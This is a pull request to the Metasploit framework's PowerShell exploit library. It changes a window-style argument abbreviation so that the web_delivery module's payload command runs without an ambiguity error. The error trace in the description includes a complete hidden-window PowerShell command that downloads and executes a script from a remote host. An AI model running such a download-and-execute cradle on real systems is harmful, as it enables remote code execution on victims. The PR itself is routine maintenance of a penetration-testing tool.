### PR TITLE
Change powershell.rb option from -w to -win

### DIFF
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -173,7 +173,7 @@ module Exploit::Powershell
       arg_string.gsub!('-NonInteractive ', '-noni ')
       arg_string.gsub!('-OutputFormat ', '-o ')
       arg_string.gsub!('-Sta ', '-s ')
-      arg_string.gsub!('-WindowStyle ', '-w ')
+      arg_string.gsub!('-WindowStyle ', '-win ')
     end
 
     # Strip off first space character


### PR DESCRIPTION
Changed -w to -win as recent errror observed executing web_delivery showed the following error : 

"'w' is ambiguous. Possible matches include: -WarningAction -WarningVariable."

Another simple fix was required and submitted on :

/usr/share/metasploit-framework/modules/exploits/multi/script/web_delivery.rb

The above changes make the web_delivery work. 

Full powershell error stack trace below:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.0.1/pwn'))

powershell.exe : Invoke-Expression : Parameter cannot be processed because the 
parameter name 
At line:1 char:1
- powershell.exe -nop -w hidden -c IEX ((new-object 
  net.webclient).downl ...
  - CategoryInfo          : NotSpecified: (Invoke-Expressi...parameter name  
    :String) [], RemoteException
  - FullyQualifiedErrorId : NativeCommandError

'w' is ambiguous. Possible matches include: -WarningAction -WarningVariable.
At line:1 char:25
